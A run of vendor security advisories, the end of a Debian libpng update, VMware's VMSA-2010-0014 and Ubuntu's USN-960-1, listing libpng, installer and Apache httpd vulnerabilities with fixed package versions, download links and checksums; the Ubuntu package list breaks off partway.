http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_alpha.deb\n Size/MD5 checksum: 287316 b05d9032dca244cfbb1773e17eb8fbf3\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_alpha.udeb\n Size/MD5 checksum: 86558 2082c8b1458c53860b8243c184909d99\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_amd64.udeb\n Size/MD5 checksum: 71944 a3992e7b18a2897879863fbf70f3e44f\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_amd64.deb\n Size/MD5 checksum: 167620 b654901994d4666d2918869ef59aef38\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_amd64.deb\n Size/MD5 checksum: 254780 dfb0d24bf329b004ccea98b3a94186be\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_arm.udeb\n Size/MD5 checksum: 64570 f8b22165ed7daf5c40ecff5e03b7c724\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_arm.deb\n Size/MD5 checksum: 159684 b64a7d362ef23b72d4af94bd48c89e33\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_arm.deb\n Size/MD5 checksum: 245526 a55f8943e244796a2dbf4b244673d9ab\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_armel.udeb\n Size/MD5 checksum: 67034 4d6f0fbce281723de483067ae4226f18\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_armel.deb\n Size/MD5 checksum: 162570 fb1927ecf7521ce2de4c3c2d3d9ba679\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_armel.deb\n Size/MD5 checksum: 245964 38148590fd5c421c6e7649767ce23556\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_hppa.deb\n Size/MD5 checksum: 170090 1a9ad8514fb3dd6111090f321553452b\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_hppa.deb\n Size/MD5 checksum: 260414 b1ada2a28da472703f953547dc2947e2\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_hppa.udeb\n Size/MD5 checksum: 73894 eb6714f86f8085811a3dc1a1218a75a3\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_i386.deb\n Size/MD5 checksum: 245468 8b6e9b5424a8991c05734f90b00182a2\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_i386.deb\n Size/MD5 checksum: 166290 70c41d2feb2aff02be6154cea7cec1f4\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_i386.udeb\n Size/MD5 checksum: 70118 e7c845ff2e87dc1dc2849ecac4428aa4\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_ia64.udeb\n Size/MD5 checksum: 111752 9b3c6f30c1d59df47d8f1736cffb5f74\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_ia64.deb\n Size/MD5 checksum: 207554 ca076c99f9d64729eab9a58632ab2b9e\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_ia64.deb\n Size/MD5 checksum: 305536 0446686bb25783804121efced246e59d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_mips.deb\n Size/MD5 checksum: 164086 e615a6007aa89ccd38a1afc482c6c51e\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_mips.udeb\n Size/MD5 checksum: 68180 beec6961eba764cd9186f4ba1e116949\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_mips.deb\n Size/MD5 checksum: 262216 937b2f2c26200b4a53f0bd8293b80af3\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_mipsel.udeb\n Size/MD5 checksum: 68464 c0e4a6cf4cbb2d6cda04ae5c0c572dd5\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_mipsel.deb\n Size/MD5 checksum: 164312 48ec081a3f25a7863fe689a212d37b07\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_mipsel.deb\n Size/MD5 checksum: 262482 560287e9b0c79a7d51ff4fd37e0a8da4\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_powerpc.deb\n Size/MD5 checksum: 253154 caa93c1b0d9460d93d7b81241dcd25fb\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_powerpc.udeb\n Size/MD5 checksum: 70748 59534d8fcb740fdfd681a173a85d72fe\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_powerpc.deb\n Size/MD5 checksum: 166354 3d521ce5930a7707bb3afc61f7c48ccc\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_s390.udeb\n Size/MD5 checksum: 73500 bceb1dab986adc60adde49c6bb267e7d\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_s390.deb\n Size/MD5 checksum: 253036 85ebb3e8ac1749f20e0c45f489f348a6\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_s390.deb\n Size/MD5 checksum: 169330 aa9808b63b2301f8be657a3c2d6797d2\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_sparc.deb\n Size/MD5 checksum: 161688 5f12a2df5cea9e05bdad35a18e07f864\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_sparc.udeb\n Size/MD5 checksum: 66084 bc6933daf2143bcc3f3b8c96e7bc29bb\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_sparc.deb\n Size/MD5 checksum: 247360 ad0ae85eb3806d0263b985139c3c54ed\n\n\n These files will probably be moved into the stable distribution on\n its next update. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n VMware Security Advisory\n\nAdvisory ID: VMSA-2010-0014\nSynopsis: VMware Workstation, Player, and ACE address several\n security issues. \nIssue date: 2010-09-23\nUpdated on: 2010-09-23 (initial release of advisory)\nCVE numbers: CVE-2010-3277 CVE-2010-1205 CVE-2010-0205\n CVE-2010-2249 CVE-2010-0434 CVE-2010-0425\n- ------------------------------------------------------------------------\n\n1. Summary\n\n VMware Workstation and Player address a potential installer security\n issue and security issues in libpng. VMware ACE Management Server\n (AMS) for Windows updates Apache httpd. \n\n2. Relevant releases\n\n VMware Workstation 7.1.1 and earlier,\n VMware Player 3.1.1 and earlier,\n VMware ACE Management Server 2.7.1 and earlier,\n\n Note: VMware Server was declared End Of Availability on January 2010,\n support will be limited to Technical Guidance for the duration\n of the support term. \n\n3. Problem Description\n\n a. VMware Workstation and Player installer security issue\n\n The Workstation 7.x and Player 3.x installers will load an index.htm\n file located in the current working directory on which Workstation\n 7.x or Player 3.x is being installed. This may allow an attacker to\n display a malicious file if they manage to get their file onto the\n system prior to installation. \n\n The issue can only be exploited at the time that Workstation 7.x or\n Player 3.x is being installed. Installed versions of Workstation and\n Player are not affected. The security issue is no longer present in\n the installer of the new versions of Workstation 7.x and Player 3.x\n (see table below for the version numbers). \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2010-3277 to this issue. \n\n VMware would like to thank Alexander Trofimov and Marc Esher for\n independently reporting this issue to VMware. \n\n The following table lists what action remediates the vulnerability\n (column 4) if a solution is available. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch\n ============= ======== ======= =================\n VirtualCenter any Windows not affected\n\n Workstation 7.x any 7.1.2 build 301548 or later *\n Workstation 6.5.x any not affected\n\n Player 3.x any 3.1.2 build 301548 or later *\n Player 2.5.x any not affected\n\n AMS any any not affected\n\n Server any any not affected\n\n Fusion any Mac OS/X not affected\n\n ESXi any ESXi not affected\n\n ESX any ESX not affected\n\n * Note: This only affects the installer, if you have a version of\n Workstation or Player installed you are not vulnerable. \n\n\n b. Third party libpng updated to version 1.2.44\n\n A buffer overflow condition in libpng is addressed that could\n potentially lead to code execution with the privileges of the\n application using libpng. Two potential denial of service issues\n are also addressed in the update. \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-1205, CVE-2010-0205, CVE-2010-2249\n to these issues. \n\n The following table lists what action remediates the vulnerability\n (column 4) if a solution is available. \n\n\n VMware Product Running Replace with/\n Product Version on Apply Patch\n ============= ======== ======= =================\n VirtualCenter any Windows not affected\n\n Workstation 7.1.x any 7.1.2 build 301548 or later\n Workstation 6.5.x any affected, patch pending\n\n Player 3.1.x any 3.1.2 build 301548 or later\n Player 2.5.x any affected, patch pending\n\n AMS any any not affected\n\n Server any any affected, no patch planned\n\n Fusion any Mac OS/X not affected\n\n ESXi any ESXi not affected\n\n ESX any ESX not affected\n\n\n c. VMware ACE Management Server (AMS) for Windows updates Apache httpd\n version 2.2.15. \n\n A function in Apache HTTP Server when multithreaded MPM is used\n does not properly handle headers in subrequests in certain\n circumstances which may allow remote attackers to obtain sensitive\n information via a crafted request that triggers access to memory\n locations associated with an earlier request. \n\n The Apache mod_isapi module can be forced to unload a specific\n library before the processing of a request is complete, resulting\n in memory corruption. \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-0434 and CVE-2010-0425 to the\n issues addressed in this update. \n\n Column 4 of the following table lists the action required to\n remediate the vulnerability in each release, if a solution is\n available. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch\n ============= ======== ======= =================\n VirtualCenter any Windows not affected\n\n Workstation any any not affected\n\n Player any any not affected\n\n AMS any Windows 2.7.2 build 301548 or later\n AMS any Linux affected, patch pending *\n\n Server any any not affected\n\n Fusion any Mac OS/X not affected\n\n ESXi any ESXi not affected\n\n ESX any ESX not affected\n\n * Note CVE-2010-0425 is not applicable to AMS running on Linux\n\n4. Solution\n Please review the patch/release notes for your product and version\n and verify the md5sum and/or the sha1sum of your downloaded file. \n\n VMware Workstation 7.1.2\n ------------------------\n http://www.vmware.com/download/ws/\n Release notes:\n http://downloads.vmware.com/support/ws71/doc/releasenotes_ws712.html\n\n Workstation for Windows 32-bit and 64-bit with VMware Tools\t\n md5sum: 2e9715ec297dc3ca904ad2707d3e2614\n sha1sum: 55b2b99f67c3dacd402fb9880999086efd264e7a\n\n Workstation for Windows 32-bit and 64-bit without VMware Tools\t\n md5sum: 066929f59aef46f11f4d9fd6c6b36e4d\n sha1sum: def776a28ee1a21b1ad26e836ae868551fff6fc3\n\n VMware Player 3.1.2\n -------------------\n http://www.vmware.com/download/player/\n Release notes:\n\nhttp://downloads.vmware.com/support/player31/doc/releasenotes_player312.html\n\n VMware Player for Windows 32-bit and 64-bit\t\n md5sum: 3f289cb33af5e425c92d8512fb22a7ba\n sha1sum: bf67240c1f410ebeb8dcb4f6d7371334bf9a6b70\n\n VMware Player for Linux 32-bit\t\n md5sum: 11e3e3e8753e1d9abbbb92c4e3c1dfe8\n sha1sum: dd1dbcdb1f4654eefc11472b68934dcb69842749\n\n VMware Player for Linux 64-bit\t\n md5sum: 2ab08e0d4050719845a64d334ca15bb1\n sha1sum: f024ad84ec831fce8667dfa9601851da5d9fa59c\n\n VMware ACE Management Server 2.7.2\n ----------------------------------\n http://downloads.vmware.com/d/info/desktop_downloads/vmware_ace/2_7\n Release notes:\n http://downloads.vmware.com/support/ace27/doc/releasenotes_ace272.html\n\n ACE Management Server for Windows\t\n md5sum: 02f0072b8e48a98ed914b633f070d550\n sha1sum: 94a68eac4a328d21a741879b9d063227c0dc1ce4\n\n5. References\n\n CVE numbers\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3277\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0434\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0425\n\n- ------------------------------------------------------------------------\n\n6. Change log\n\n2010-09-23 VMSA-2010-0014\nInitial security advisory after release of Workstation 7.1.2,\nPlayer 3.1.2 and ACE Management Server 2.7.2 on 2010-09-23\n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n * security-announce at lists.vmware.com\n * bugtraq at securityfocus.com\n * full-disclosure at lists.grok.org.uk\n\nE-mail: security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Center\nhttp://www.vmware.com/security\n\nVMware Security Advisories\nhttp://www.vmware.com/security/advisoiries\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2010 VMware Inc. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (MingW32)\n\niEYEARECAAYFAkycSrQACgkQS2KysvBH1xmT9wCfbBUS4GYrJohz+QMLYcoiFmSh\neTgAoIAmx+ilbe2myj02daLjFrVQfQII\n=5jlh\n-----END PGP SIGNATURE-----\n. ===========================================================\nUbuntu Security Notice USN-960-1 July 08, 2010\nlibpng vulnerabilities\nCVE-2010-1205, CVE-2010-2249\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 9.04\nUbuntu 9.10\nUbuntu 10.04 LTS\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n libpng12-0 1.2.8rel-5ubuntu0.6\n\nUbuntu 8.04 LTS:\n libpng12-0 1.2.15~beta5-3ubuntu0.3\n\nUbuntu 9.04:\n libpng12-0 1.2.27-2ubuntu2.2\n\nUbuntu 9.10:\n libpng12-0 1.2.37-1ubuntu0.2\n\nUbuntu 10.04 LTS:\n libpng12-0 1.2.42-1ubuntu2.1\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nDetails follow:\n\nIt was discovered that libpng did not properly handle certain malformed PNG\nimages. If a user or automated system were tricked into opening a crafted\nPNG file, an attacker could cause a denial of service or possibly execute\narbitrary code with the privileges of the user invoking the program. \n(CVE-2010-1205)\n\nIt was discovered that libpng did not properly handle certain malformed PNG\nimages. If a user or automated system were tricked into processing a\ncrafted PNG image, an attacker could possibly use this flaw to consume all\navailable resources, resulting in a denial of service. (CVE-2010-2249)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.6.diff.gz\n Size/MD5: 24044 8979ca6b113137fe5ee051c1c70571eb\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.6.dsc\n Size/MD5: 661 92722fa973e92a99f982fe05b5826adf\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz\n Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.6_all.deb\n Size/MD5: 842 dcbc7d24c8426e3b3024859ec157f57e\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_amd64.deb\n Size/MD5: 114528 aea355e99e67b76c9464f8cc49b3560d\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_amd64.deb\n Size/MD5: 247576 f0e52e10a663f9b1b04d9371d4a2cf14\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_amd64.udeb\n Size/MD5: 69504 6536e83152b2cf00d0d961b9b095c2d5\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_i386.deb\n Size/MD5: 112048 b8f85cc6154602422a8841a5cad1a4a1\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_i386.deb\n Size/MD5: 239628 fb6f6e62a9fa6114c50946c74cb2ed5d\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_i386.udeb\n Size/MD5: 66946 501acb21d567d62608904e4272ff842d\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_powerpc.deb\n Size/MD5: 111648 19cccb12fb968f40f04068b9da24f589\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_powerpc.deb\n Size/MD5: 245230 ebdbfc860056170b7a165479d7905bb3\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_powerpc.udeb\n Size/MD5: 66458 24e918a95770150b4df72530bd6de095\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_sparc.deb\n Size/MD5: 109156 510d17affd2c0cf3f5dce5379df57d49\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_sparc.deb\n Size/MD5: 240072 1ff11e0649a58bc7b809c86941aaafd7\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_sparc.udeb\n Size/MD5: 63882 d7df02c540e66a536cbffca5d02645d5\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.3.diff.gz\n Size/MD5: 22755 f5c0ba19b04eba8264ebb6b30c5617d6\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.3.dsc\n Size/MD5: 832 d08a82b28411baa0184d3b8231fd8b61\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz\n Size/MD5: 829038 77ca14fcee1f1f4daaaa28123bd0b22d\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-3ubuntu0.3_all.deb\n Size/MD5: 940 7344fa4e61880636b014525f6e6482a1\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_amd64.deb\n Size/MD5: 190186 01f82b2b967c5212e834dd57c12c1a7c\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_amd64.deb\n Size/MD5: 179752 c26e243dd21f5dd10b478c0415215c1c\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_amd64.udeb\n Size/MD5: 70534 5f7628d9b644ae953c515d18f7de9980\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_i386.deb\n Size/MD5: 188782 51354007cca0796218e3aaeba6142c41\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_i386.deb\n Size/MD5: 171216 b7a092ef2f5955b380adc015bfae6c81\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_i386.udeb\n Size/MD5: 69082 7612cd438ddfaab236de5f342f709b66\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_lpia.deb\n Size/MD5: 189664 4825baf36c5d14b5066d548aaf050866\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_lpia.deb\n Size/MD5: 172962 b16b496d6553fbf28523147617011b95\n http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_lpia.udeb\n Size/MD5: 70020 61f5d75c4435333ef586677a07d49915\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_powerpc.deb\n Size/MD5: 190300 8ac6e4c1efb73de848d5bc5457093e7a\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_powerpc.deb\n Size/MD5: 179166 d92637edf805d7d673a4440b2605dc57\n http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_powerpc.udeb\n Size/MD5: 70604 adf25dd26d85725ab3c74c4a80a7a541\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_sparc.deb\n Size/MD5: 185622 ef3cf5486afe387d09bf05106893b371\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_sparc.deb\n Size/MD5: 173422 4b2f3476b423a3c5c31ee0738bfb4458\n http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_sparc.udeb\n Size/MD5: 65928 ab5ac0b24d618dc432d1763a0e50ebda\n\nUpdated packages for Ubuntu 9.04:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.2.diff.gz\n Size/MD5: 176459 b2f27af9534f3c5b9a120680cd41ce7c\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.2.dsc\n Size/MD5: 1296 b66efe2157ab6f3dad6e57b4fe9dbf13\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27.orig.tar.gz\n Size/MD5: 783204 13a0de401db1972a8e68f47d5bdadd13\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.27-2ubuntu2.2_all.deb\n Size/MD5: 932 1c66e49e2b875fa40c5556c19d076508\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_amd64.udeb\n Size/MD5: 72852 a1bbcffd25c3ec87cbdf86be154962fc\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_amd64.deb\n Size/MD5: 168576 9f40f2846c21aa5835f53ab6895ec5cf\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_amd64.deb\n Size/MD5: 255784 d9060ad287e40ded1848b79284abbcc0\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_i386.udeb\n Size/MD5: 71102 c18134055d747d066b60218b69e99d45\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_i386.deb\n Size/MD5: 166904 e8151a3f79f0fff6d98bbb0675621594\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_i386.deb\n Size/MD5: 247922 ae8412d1c420f1dd63cb436382cad51f\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_lpia.udeb\n Size/MD5: 71488 5179307ffe74c10515e61503e647606f\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_lpia.deb\n Size/MD5: 167370 dd07d7a09484eb7711da5cd874099abe\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_lpia.deb\n Size/MD5: 248872 a34333b123f4d12e7872868111942cbd\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_powerpc.udeb\n Size/MD5: 71674 f742f2771d94ca29746906c1177d657d\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_powerpc.deb\n Size/MD5: 167514 478378fde5c7fd14fbffa1be072aa21c\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_powerpc.deb\n Size/MD5: 254642 ba3f255f4346a4483c5410d55acaac65\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_sparc.udeb\n Size/MD5: 66670 ee067298bc51471f06bcf1a74b557310\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_sparc.deb\n Size/MD5: 162336 ab167dcdbbd930a3d976af0ad57cbac2\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_sparc.deb\n Size/MD5: 248428 8b96f4ff4f0ad8e366ed4475d3890948\n\nUpdated packages for Ubuntu 9.10:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.2.diff.gz\n Size/MD5: 20129 f230ec37944a0150ffc83cfdddc7c906\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.2.dsc\n Size/MD5: 1293 fce0b2fd543aeff27d47fb91f12af053\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37.orig.tar.gz\n Size/MD5: 805380 7480dbbf9f6c3297faf6fe52ec9b91ab\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.37-1ubuntu0.2_all.deb\n Size/MD5: 932 cee669d58ac9660e1fe71cf9e2eeda9d\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_amd64.udeb\n Size/MD5: 73938 15bb328beed6ab3287967c54e4177018\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_amd64.deb\n Size/MD5: 175088 f003cc7565826cfcc337ab409ffc6e8f\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_amd64.deb\n Size/MD5: 265400 2d26dc0e9ddb6c2010776fbbcb82d791\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_i386.udeb\n Size/MD5: 70444 a80af68dda6ff1aa3168040d33600e64\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_i386.deb\n Size/MD5: 171594 3fca9df961cc3616b75f6518ab870a68\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_i386.deb\n Size/MD5: 255474 1ab05dffaa25e1d9190d0ea872b0fbd8\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_lpia.udeb\n Size/MD5: 71066 0495b247d489438259937bee1f17761f\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_lpia.deb\n Size/MD5: 172296 730fd7a16f9496e37ffee99ea68d15a6\n 